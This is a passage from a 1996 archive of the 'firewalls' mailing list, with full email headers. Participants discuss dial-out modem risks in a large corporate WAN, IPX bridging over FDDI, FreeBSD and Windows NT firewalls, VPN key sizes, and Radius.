phone line does not accept incoming calls. Entire risk is via compromise due to 'inside' user mistakes -- e.g. virus infection from 'downloaded' executable. + + * Networked PC using a dial-out modem bank (no modem attached to the PC) + - More secure because of centralized control + - What would the risks be here??? functionally, little if any different than modem on the PC. less chance of user 'inadvertently' leaving a 'dial-in' server running. However, if line is restricted from incoming calls, point is moot. + + * Stand-alone (never networked) PC using SLIP/PPP + - Viruses and trojans can be placed on the dial-out employee's hard drive + - Any files copied to diskettes and placed on the network could cause + problems + - Employee's PC could be used as a repository That machine is vulnerable, to any/all network-based attacks. It protects the -rest- of the internal network against all but _very_ determined_ attacks. *Possible vector* of infection to internal network, via floppy-transferred files. + + * Stand-alone PC using communications software and no TCP/IP + - Again, less risks because of the communications software + - What would the risks be here??? Pretty much the same as a 'terminal-emulating' _networked_ PC. you buy an additional layer of containment, but if the user is 'foolish' enough to down- load an 'unknown' executable, he's also 'foolish' enough to move it to the networked machines intact. And you get infected, anyway. + + Please comment on items I have listed that you believe are NOT risks. Also, + please let me know the risks for each type of dial-out PC that I did not have + listed. Do you know of other dial-out methods I did not list? If so, what + are they, and what are the associated risks? + + Thanks in advance for your help!! + + Becky + herold.becky@mhs-pfg1.attmail.com + + =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + The opinions expressed here are strictly my own and do not necessarily + represent those of my employer. + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + From firewalls-owner Tue Jan 2 12:52:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA01574 for firewalls-outgoing; Tue, 2 Jan 1996 12:49:02 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA01569 for ; Tue, 2 Jan 1996 12:48:58 -0800 (PST) Received: from pferguso-pc.cisco.com (c4robo4.cisco.com [171.68.13.74]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id MAA25036 for ; Tue, 2 Jan 1996 12:47:50 -0800 Message-Id: <199601022047.MAA25036@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 02 Jan 1996 15:48:15 -0500 To: firewalls@GreatCircle.com From: Paul Ferguson Subject: ISS ported to NT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From the 'For What Its Worth' department - The January 1, 1996 edition of Communications Week has an article [Internet Scanner Ported to Win NT, by Karen Rodriguez, p. 24] explaining that Internet Security Systems, Inc. has announced plans to ship a a version of it's Internet Scanner software for systems running Windows NT. - paul -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Tue Jan 2 14:23:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA03466 for firewalls-outgoing; Tue, 2 Jan 1996 14:06:53 -0800 (PST) Received: from relay.ashton.csc.com (relay.ashton.csc.com [20.2.54.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA03457 for ; Tue, 2 Jan 1996 14:06:48 -0800 (PST) Received: by relay.ashton.csc.com; id RAA15882; Tue, 2 Jan 1996 17:05:56 -0500 Received: from mccoy.ashton.csc.com(20.2.51.2) by relay.ashton.csc.com via smap (g3.0.1) id sma015879; Tue, 2 Jan 96 17:05:45 -0500 Received: (from ckostick@localhost) by mccoy.ashton.csc.com (8.6.9/8.6.9) id RAA00396 for firewalls@greatcircle.com; Tue, 2 Jan 1996 17:18:37 -0500 From: Chris Kostick Message-Id: <199601022218.RAA00396@mccoy.ashton.csc.com> Subject: firewall encryption information To: firewalls@greatcircle.com Date: Tue, 2 Jan 1996 17:18:37 -0500 (EST) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A few questions about firewalls setting up virtual private networks. - for Gauntlet; what is the encryption algorithm used and what is the key size for session keys? - for Eagle; what is the key size used for DES encryption? - for Firewall-1; what is the key size used for DES encryption? -- chris From firewalls-owner Tue Jan 2 14:37:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA03978 for firewalls-outgoing; Tue, 2 Jan 1996 14:26:27 -0800 (PST) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA03973 for ; Tue, 2 Jan 1996 14:26:23 -0800 (PST) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id CAA03032; Mon, 1 Jan 1996 02:27:56 -0500 Date: Mon, 1 Jan 1996 02:27:52 -0500 (EST) From: Rabid Wombat To: Pablo cc: firewalls@GreatCircle.COM Subject: Re: ipx-bridging & ip-routing In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk below: ---------------------------------------- Rabid Wombat wombat@mcfeely.bsfs.org ---------------------------------------- On Tue, 2 Jan 1996, Pablo wrote: > > > > Hi all, > I am working on a problem in which I need some sort of unix box ( > linux/bsd ? ) to do ip-routing ( no problem there, i know ), & do > ipx-bridging. The second part is the problem area. Coming into & going > out of the box will be 100 mbps FDDI. I have set up a linux box and put > ipfwadmin & ipxbridge & ipxripd ( mostly from sunsite ) on it, and it > seems like it will work ok for ipx bridging, but it seems like it will be > far to ineffecient to handle traffic from 300+ users @ 100mbps. > vinod@cse.iitb.ernet.in says in the documentation on ipx-bridge > that he is currently using ipx-bridge to connect two networks, i'm not > sure how large the networks are. I was hoping someone out there would > have some comments or ideas on what to use to ROUTE ip packets with good > control, and bridge ipx-packets as fast as possible. I can use a > dedicated box for the routing, or even one of the cisco products if need > be, I just need to know the best way to go. Any insight would be greatly > appreciated. My guess is that the PC bus will be the bottleneck. I've ran PC servers on FDDI that had EISA bus (w/ EISA FDDI NICs) and couldn't get more than about 25 Mb/s stuffed into the box. I haven't looked into this lately; PCI may have a higher raw capacity. If you are expecting to be using the FDDI to capacity you may be outa luck using a PC. Hope this is of some use. I'd be glad to hear from someone who's done this successfully. > > Thanks in advance! > > paul > > > From firewalls-owner Tue Jan 2 15:37:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA05789 for firewalls-outgoing; Tue, 2 Jan 1996 15:23:39 -0800 (PST) Received: from sun6.barr.com (gate.barr.com [199.199.125.133]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA05784 for ; Tue, 2 Jan 1996 15:23:31 -0800 (PST) Received: by sun6.barr.com (4.1/SMI-4.1) id AA25023; Tue, 2 Jan 96 17:22:49 CST Received: from wpo.barr.com(192.102.178.238) by sun6.barr.com via smap (V1.3) id sma025018; Tue Jan 2 23:22:39 1996 Received: from Barr_Domain_1-Message_Server by wpo.barr.com with Novell_GroupWise; Tue, 02 Jan 1996 17:22:45 -0600 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Tue, 02 Jan 1996 17:21:56 -0600 From: Steve Devore To: kkohls@cleveland.dfas.mil, firewalls@greatcircle.com Subject: FreeBSD as a firewall -Reply Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have used it and have not had any problems with it. I have set up a couple of systems where I used the fwtk toolkit, socks, and some other stuff. It was not difficult to set up. However, I wouldn't consider it unless you have considerable unix experience (as with anything that is not supported). >>> KOHLS, KERSTEN 1/2/96, 01:13pm >>> Greetings -- Does anyone use FreeBSD as a firewall and can you tell me what problems you've had with it? We're evaluating solutions and this is one of the possibilities . . . TIA -- Kersten Kohls kkohls@cleveland.dfas.mil From firewalls-owner Tue Jan 2 16:37:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA07126 for firewalls-outgoing; Tue, 2 Jan 1996 16:32:49 -0800 (PST) Received: from kangtong. (kangtong.etri.re.kr [129.254.32.41]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA07121 for ; Tue, 2 Jan 1996 16:32:22 -0800 (PST) Received: by kangtong. (5.0/SMI-SVR4) id AA07697; Wed, 3 Jan 1996 09:25:24 +0900 Date: Wed, 3 Jan 1996 09:25:24 +0900 From: wyyou@kangtong (You Woo Yeol) Message-Id: <9601030025.AA07697@kangtong.> Content-Type: text Apparently-To: Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please stop sending e-mail. I'm no longer interested. Thank you WooYeol You From firewalls-owner Tue Jan 2 16:52:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA07317 for firewalls-outgoing; Tue, 2 Jan 1996 16:35:44 -0800 (PST) Received: from yarrina.connect.com.au (yarrina.connect.com.au [192.189.54.17]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA07301 for ; Tue, 2 Jan 1996 16:35:38 -0800 (PST) Received: from suburbia.net (suburbia.apana.org.au [192.188.107.90]) by yarrina.connect.com.au with ESMTP id LAA18046 (8.6.12/IDA-1.6); Wed, 3 Jan 1996 11:34:24 +1100 Received: (proff@localhost) by suburbia.net (8.7.3/Proff-950810) id LAA17736; Wed, 3 Jan 1996 11:34:11 +1100 From: Julian Assange Message-Id: <199601030034.LAA17736@suburbia.net> Subject: Re: Compression is useful - but for security, not To: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson, P.E. Information Security) Date: Wed, 3 Jan 1996 11:34:10 +1100 (EST) Cc: firewalls@greatcircle.com, bvvanor@rssi.rssi.com In-Reply-To: <960102140249.202006bf@hobbes.orl.mmc.com> from "A. Padgett Peterson, P.E. Information Security" at Jan 2, 96 02:02:49 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > 1) Compression aids performance. It does not aid security (at best is SBO). Not so! Compressed plain text, which is then ciphered is several orders of magnitude harder to break (depending on the compression scheme and attack). -- +----------------------------------+-----------------------------------------+ |Julian Assange | "if you think the United States has | |FAX: +61-3-9819-9066 | stood still, who built the largest | |EMAIL: proff@suburbia.net | shopping centre in the world?" - Nixon | +----------------------------------+-----------------------------------------+ From firewalls-owner Tue Jan 2 17:37:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA12528 for firewalls-outgoing; Tue, 2 Jan 1996 17:33:06 -0800 (PST) Received: from m1.interserv.com (troi.interserv.net [165.121.1.68]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA12523 for ; Tue, 2 Jan 1996 17:33:01 -0800 (PST) Received: (from root@localhost) by m1.interserv.com (8.6.12/8.6.12) id RAA27726; Tue, 2 Jan 1996 17:26:53 -0800 Message-Id: <199601030126.RAA27726@m1.interserv.com> Received: from interserv.com (root@sarek.interserv.net [165.121.1.87]) by m1.interserv.com (8.6.12/8.6.12) with ESMTP id RAA27681 for ; Tue, 2 Jan 1996 17:26:40 -0800 Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by interserv.com (8.6.12/8.6.12) with ESMTP id RAA22040 for ; Tue, 2 Jan 1996 17:32:38 -0800 Received: from miles.greatcircle.com by relay5.UU.NET with ESMTP id QQzwvt14981; Tue, 2 Jan 1996 20:25:02 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA07126 for firewalls-outgoing; Tue, 2 Jan 1996 16:32:49 -0800 (PST) Received: from kangtong. (kangtong.etri.re.kr [129.254.32.41]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA07121 for ; Tue, 2 Jan 1996 16:32:22 -0800 (PST) Received: by kangtong. (5.0/SMI-SVR4) id AA07697; Wed, 3 Jan 1996 09:25:24 +0900 Date: Wed, 3 Jan 1996 09:25:24 +0900 From: kangtong!wyyou@uunet.uu.net (You Woo Yeol) Content-Type: text Apparently-To: Firewalls@GreatCircle.COM From: Interserv Operations X-Loop: postmaster@interserv.com Subject: Mailbox soft limit exceeded To: mevans01@interserv.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Your mailbox has exceeded the soft size limit of 8MB. Mail will continue to be delivered to your mailbox until it reaches the hard size limit of 15MB. please removed unecessary messages from you mailbox. Additionally, if you're using CompuServe/Spry AirMail you may choose the local inbox option which will download the mail from your remote inbox to your local system inbox before allowing you to read it. PLEASE NOTE: Use of the local inbox option will preclude accessing the downloaded mail messages except from the system on which the messages were downloaded. -- Interserv Network Operations Center Postmaster@interserv.com 2001 6th Ave. Suite 3025B noc@interserv.net Seattle, WA. 95121 CompuServe/Internet Division From firewalls-owner Tue Jan 2 19:52:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA15904 for firewalls-outgoing; Tue, 2 Jan 1996 19:46:51 -0800 (PST) Received: from relay.ashton.csc.com (relay.ashton.csc.com [20.2.54.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA15899 for ; Tue, 2 Jan 1996 19:46:45 -0800 (PST) Received: by relay.ashton.csc.com; id WAA16968; Tue, 2 Jan 1996 22:45:56 -0500 Received: from mccoy.ashton.csc.com(20.2.51.2) by relay.ashton.csc.com via smap (g3.0.1) id sma016966; Tue, 2 Jan 96 22:45:47 -0500 Received: (from ckostick@localhost) by mccoy.ashton.csc.com (8.6.9/8.6.9) id WAA00783 for firewalls@greatcircle.com; Tue, 2 Jan 1996 22:58:55 -0500 From: Chris Kostick Message-Id: <199601030358.WAA00783@mccoy.ashton.csc.com> Subject: encrypting modems To: firewalls@greatcircle.com Date: Tue, 2 Jan 1996 22:58:55 -0500 (EST) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can anyone provide me a list of vendors who make encrypting modems? That is, a modem with encryption in hardware rather than software on a machine just sending out over a modem. -- chris From firewalls-owner Tue Jan 2 20:22:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA16558 for firewalls-outgoing; Tue, 2 Jan 1996 20:06:29 -0800 (PST) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA16553 for ; Tue, 2 Jan 1996 20:06:24 -0800 (PST) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id XAA03458; Tue, 2 Jan 1996 23:02:40 -0500 Date: Tue, 2 Jan 1996 23:02:36 -0500 (EST) From: Rabid Wombat To: /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com cc: firewalls@GreatCircle.COM, /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com Subject: Re: Firewalls needed for both dial-in AND dial-out In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk below: ---------------------------------------- Rabid Wombat wombat@mcfeely.bsfs.org ---------------------------------------- On Tue, 2 Jan 1996 /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com wrote: > I'm putting together a document listing the risks of not only allowing > dial-in access to a networked PC (used for accessing computer systems > on a corporate WAN/LAN at least some of the time...typically has a network > interface card); but also the risks of allowing dial-out access from a > networked PC. I'd appreciate your help, wisdom, and knowledge in critiquing > the following regarding the dial-out issues. I apologize if there is a FAQ > on this somewhere...I currently do not have very convenient access to the > Internet except via e-mail. If you could provide the location of such a FAQ, > that'd be great! > > First, here are some givens: > * I know any type of remote access is NOT risk-free...that acceptable risks > must be determined to allow efficient and effective use of remote access > (please no long philisophical discussions of how we can never remove all > risks from remote access). The basic approach is to determine what your assets are, who/what the threats are, and the likelyhood of each type of attempt. You can then identify possible solutions, and determine what is cost effective, and make a guess as to how secure you are/aren't. I've seen this sumarized as Asset Valuation, Threat Modeling, Assessment of Vulnerability, Countermeasure Evaluation, and Risk Assessment. > * I know policies need to be established for end-users to follow to help > ensure remote access security. (This document will be used to establish > buy-in for the policies and educate end-users why the policies are > necessary.) It's a good idea to formalize a security policy, and make it known to users, as you are doing. You may want to go a step further, by requiring users to sign a usage policy, although this may depend on your corporate culture. Also, an exit briefing should inform users that their obligations to the organazation don't end when the terminate their employment. > * The environment: Large nation-wide WAN composed of several hundred LANs > and running virtually every type of operating system imaginable. 18,000+ > users. > * With so many users, it's unlikely that all (or even a large percentage) of > them will set up the dial-out access to be STRICTLY dial-out, will keep the > modem shut off when not in use (if their modem set-up even allows this), or > will know AND UNDERSTAND the risks involved when connecting using TCP/IP. > * Users may need to dial-out to not only the Internet, but also to a vendor > or customer, to a BBS, or to services such as Lexus/Nexus, CompuServ, AOL, > etc. > * Dial-in access to networked PCs is being controlled through firewalls. > (Would like to see dial-out occur through firewalls also.) > > So, what are the risks involved with various dial-out methods? > * Networked PC with modem using SLIP/PPP > - Provides bi-directional access > - Unauthorized folks (let's call them intruders!) can enter the WAN during > the employee's dial-out session > - Once the intruder enters the WAN he/she can wander around the systems > trying to find weaknesses and other entry points > - Files can be transferred to the dial-out employee's hard-drive > - Files on the dial-out employee's hard-drive may also be copied, deleted, > and possibly modified > - Files may also be copied to, deleted, or modified on the other WAN > systems > - Viruses and/or trojan horses may be placed on the dial-out employee's > hard drive, or on one of the systems on the WAN > - Changes may be made to WAN systems which could prevent access to the WAN > by legitimate WAN users The (potentially) worst breach I've run into was at a site belonging to one of our NATO allies; an end-user wanted to FTP files from a U.S. site, and didn't know how to request access through the firewall. He installed Netmanage, and enabled the IP Routing feature - opened the whole network up. Fortunately, monitoring caught this immediately, and we were finally able to get all the modems out of end-users hands as a result. > > * Networked PC using communications software (eg., SmallTalk) with no TCP/IP > - Less risks than PPP/SLIP because of the configurability of the > communications software to allow only dial-out (IF the employee > remembers to configure the software this way) > - What would the risks be here??? > With 18,000+ users, I'd expect a wide variety of user-installed communication software to start showing up, both purchased and bootlegged. Many popular packages support host mode, and I've run into quite a few users who will take the time to figure out how to use this the first time they run into a file too big to take home on a floppy. Even worse are the remote control packages, such as PC Anywhere. They're great for telecommuting, but are a security nightmare, especially if the end-user installs and configures. In terms of risks, a fair number of security breaches involve current employees with legitimate system access. The most common threats involving dial-out systems are non-work/ recreational usage, bootlegging of software (both acquiring and distributing), and exporting corporate data (for sale, or to benefit a future employer). Launching attacks on other (outside) systems is also a problem. > * Networked PC using a dial-out modem bank (no modem attached to the PC) > - More secure because of centralized control > - What would the risks be here??? > A better solution than giving modems to users. Even the possibility that someone is watching/monitoring is of some value. What are your applications? Could users TELNET to a UNIX system, and then dial out from there? You could then go as far as using single-use (couponing) passwords, and monitor sessions. You're still at risk to internal monitoring; a sniffer attack could be used to obtain passwords to external systems. Denial of use attacks could be launched against the comm server, and session hijacking could be employed. These require more sophistication than other attacks, and require access to the local segment. > * Stand-alone (never networked) PC using SLIP/PPP > - Viruses and trojans can be placed on the dial-out employee's hard drive > - Any files copied to diskettes and placed on the network could cause > problems > - Employee's PC could be used as a repository > > * Stand-alone PC using communications software and no TCP/IP > - Again, less risks because of the communications software > - What would the risks be here??? > > Please comment on items I have listed that you believe are NOT risks. Also, > please let me know the risks for each type of dial-out PC that I did not have > listed. Do you know of other dial-out methods I did not list? If so, what > are they, and what are the associated risks? > > Thanks in advance for your help!! Hope this is of some use. I'm working on similar projects, and would be happy to trade ideas. > > Becky > herold.becky@mhs-pfg1.attmail.com > > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- > The opinions expressed here are strictly my own and do not necessarily > represent those of my employer. > -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- > From firewalls-owner Tue Jan 2 20:37:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA16898 for firewalls-outgoing; Tue, 2 Jan 1996 20:28:25 -0800 (PST) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA16893 for ; Tue, 2 Jan 1996 20:28:21 -0800 (PST) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id XAA03483; Tue, 2 Jan 1996 23:26:03 -0500 Date: Tue, 2 Jan 1996 23:26:00 -0500 (EST) From: Rabid Wombat To: firewalls@greatcircle.com Subject: rfi Radius Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is anyone out there using Radius w/ Portmasters? I'd be interested in getting informed opinions, as I'm considering implementing it. Since it uses encrypted sessions, can the system serving as a firewall also serve as the Radius host, or is this opening a hole? ---------------------------------------- Rabid Wombat wombat@mcfeely.bsfs.org ---------------------------------------- From firewalls-owner Wed Jan 3 03:07:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA24163 for firewalls-outgoing; Wed, 3 Jan 1996 02:57:52 -0800 (PST) Received: from avalon.immortal.net.au (modem2.cynergy.com [198.142.58.9]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id CAA24158 for ; Wed, 3 Jan 1996 02:57:41 -0800 (PST) Received: (from mcleod@localhost) by avalon.immortal.net.au (8.6.12/8.6.9) id VAA02132; Wed, 3 Jan 1996 21:00:18 +1000 Date: Wed, 3 Jan 1996 21:00:17 +1000 (EST) From: Shaw Innes To: Rabid Wombat cc: Pablo , firewalls@GreatCircle.COM Subject: Re: ipx-bridging & ip-routing In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 1 Jan 1996, Rabid Wombat wrote: > My guess is that the PC bus will be the bottleneck. I've ran PC servers on > FDDI that had EISA bus (w/ EISA FDDI NICs) and couldn't get more than > about 25 Mb/s stuffed into the box. I haven't looked into this lately; > PCI may have a higher raw capacity. If you are expecting to be using the > FDDI to capacity you may be outa luck using a PC. > > Hope this is of some use. I'd be glad to hear from someone who's done > this successfully. I don't really know an awful lot about fddi, but I could see that a PC would cause a bottleneck at 100mb/s also. However, I have noticed that there exists Linux for, mips, sparc and alpha architectures. Hence if the PC was causing a bottleneck, surely you could buy a sun and run linux on the sun, using the sun's faster bus to route/bridge the packets? Perhaps not... this is just a theory Regards, Shaw +----------------------------------------+-----------------------+ | Shaw Innes | mcleod@cynergy.com.au | | IRC: McLeod Mobile: 019-470-556 | mcleod@healey.com.au | | WWW: http://www.odyssey.com.au/mcleod | mcleod@odyssey.com.au | +----------------------------------------+-----------------------+ | "If I were to wish for anything, I should not wish | | for wealth and power, but for the eye which, | | ever young and ardent, sees the possible" | +----------------------------------------------------------------+ From firewalls-owner Wed Jan 3 03:37:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA24992 for firewalls-outgoing; Wed, 3 Jan 1996 03:28:07 -0800 (PST) Received: from sven.lpa.se ([194.23.43.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA24987 for ; Wed, 3 Jan 1996 03:28:01 -0800 (PST) Message-Id: <199601031128.DAA24987@miles.greatcircle.com> Received: from hans.lpa.se by sven.lpa.se (NTMail 2.11.26) id aa000469 Wed, 3 Jan 96 12:27:04 +0000 (CET) X-Sender: hans@sven.lpa.se X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 03 Jan 1996 12:27:05 +0100 To: firewalls@greatcircle.com From: Hans Lissborg Subject: Firewall for Windows NT? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anyone know of a free (or cheap) firewall for Windows NT? Thanks Hans From firewalls-owner Wed Jan 3 04:22:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA26502 for firewalls-outgoing; Wed, 3 Jan 1996 04:08:05 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA26488 for ; Wed, 3 Jan 1996 04:07:55 -0800 (PST) Received: from pferguso-pc.cisco.com (c1robo6.cisco.com [171.68.13.16]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id EAA07234; Wed, 3 Jan 1996 04:05:42 -0800 Message-Id: <199601031205.EAA07234@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 03 Jan 1996 07:06:10 -0500 To: Shaw Innes From: Paul Ferguson Subject: Re: ipx-bridging & ip-routing Cc: Rabid Wombat , Pablo , firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is there some reason why a router is not being considered? It would appear to be a natural choice... - paul At 09:00 PM 1/3/96 +1000, Shaw Innes wrote: >On Mon, 1 Jan 1996, Rabid Wombat wrote: > >> My guess is that the PC bus will be the bottleneck. I've ran PC servers on >> FDDI that had EISA bus (w/ EISA FDDI NICs) and couldn't get more than >> about 25 Mb/s stuffed into the box. I haven't looked into this lately; >> PCI may have a higher raw capacity. If you are expecting to be using the >> FDDI to capacity you may be outa luck using a PC. >> >> Hope this is of some use. I'd be glad to hear from someone who's done >> this successfully. > >I don't really know an awful lot about fddi, but I could see that a PC >would cause a bottleneck at 100mb/s also. However, I have noticed that >there exists Linux for, mips, sparc and alpha architectures. Hence if >the PC was causing a bottleneck, surely you could buy a sun and run linux >on the sun, using the sun's faster bus to route/bridge the packets? > >Perhaps not... this is just a theory > >Regards, > Shaw > -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Wed Jan 3 05:37:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA28385 for firewalls-outgoing; Wed, 3 Jan 1996 05:23:43 -0800 (PST) Received: from netcomsv.netcom.com (uucp3.netcom.com [163.179.3.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA28380 for ; Wed, 3 Jan 1996 05:23:39 -0800 (PST) From: kurt@hteinc.com Received: by netcomsv.netcom.com with UUCP (8.6.12/SMI-4.1) id FAA08677; Wed, 3 Jan 1996 05:13:23 -0800 Received: from rs01.hteinc.com by rs02.hteinc.com (8.6.12/1.7) id HAA14114; Wed, 3 Jan 1996 07:31:08 -0500 Received: from ws11.hteinc.com (ws11.hteinc.com [172.24.0.30]) by rs01.hteinc.com (8.6.12/1.1) with SMTP id HAA67450 for ; Wed, 3 Jan 1996 07:31:07 -0500 Date: Wed, 3 Jan 96 07:21:17 PST Subject: Public traffic over private network To: firewalls@greatcircle.com X-Mailer: Chameleon ENGP1, TCP/IP for Windows, NetManage Inc. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We have a client who has told us about their upcoming internet access. The setup they are proposing, in my opinion, is a security risk. They have a corporate WAN with 15 segments/routers connected to a FDDI backbone. They are are getting two Class C addresses. One for the WWW, FTP, etc. segment that will be connected directly to the Internet and a second class C that will be for other public services. The problem is the second class C will be on the other side of the FDDI ring. Therefore public traffic will have to pass over the FDDI to get to the second class C. But at the same time everyone in the orginazation will have access out to the net. They don't have a security policy other than don't let the bad guys mess up any stuff. Now I know that the routers can be programmed to an extent to disallow certain access. But it seems to me that allowing public traffic on the privite network is asking (advertising) for a break in. If anyone has any comments on this setup, please comment. Kurt Kessel HTE, Inc. kurt@hteinc.com 407-841-3235 (v) 407-246-8835 (fax) From firewalls-owner Wed Jan 3 06:22:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA29947 for firewalls-outgoing; Wed, 3 Jan 1996 06:19:00 -0800 (PST) Received: from godel2.bim.be (godel2.bim.be [141.253.4.135]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA29942 for ; Wed, 3 Jan 1996 06:18:54 -0800 (PST) From: pc@bim.be Received: from gauss.bim.be by godel2.bim.be (5.x/SMI-SVR4) id AA01060; Wed, 3 Jan 1996 14:17:25 +0100 Date: Wed, 3 Jan 1996 14:17:25 +0100 Message-Id: <9601031317.AA01060@godel2.bim.be> To: hans@lpa.se Subject: Re: Firewall for Windows NT? Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A firewall called "catapult" is announced by Microsoft. I don't know when it will be available. Philippe -- Ph. Cayphas Senior Engineer E-Mail: pc@bim.be Telephone: +32(10)47.08.32 Fax : +32(10)47.08.11 Postal Mail : Ph. Cayphas BIM sa 4, Av. Albert Einstein 1348 Louvain-La-Neuve Belgium From firewalls-owner Wed Jan 3 06:37:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA00184 for firewalls-outgoing; Wed, 3 Jan 1996 06:35:05 -0800 (PST) Received: from logicon.com (klee.logicon.com [137.51.252.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with 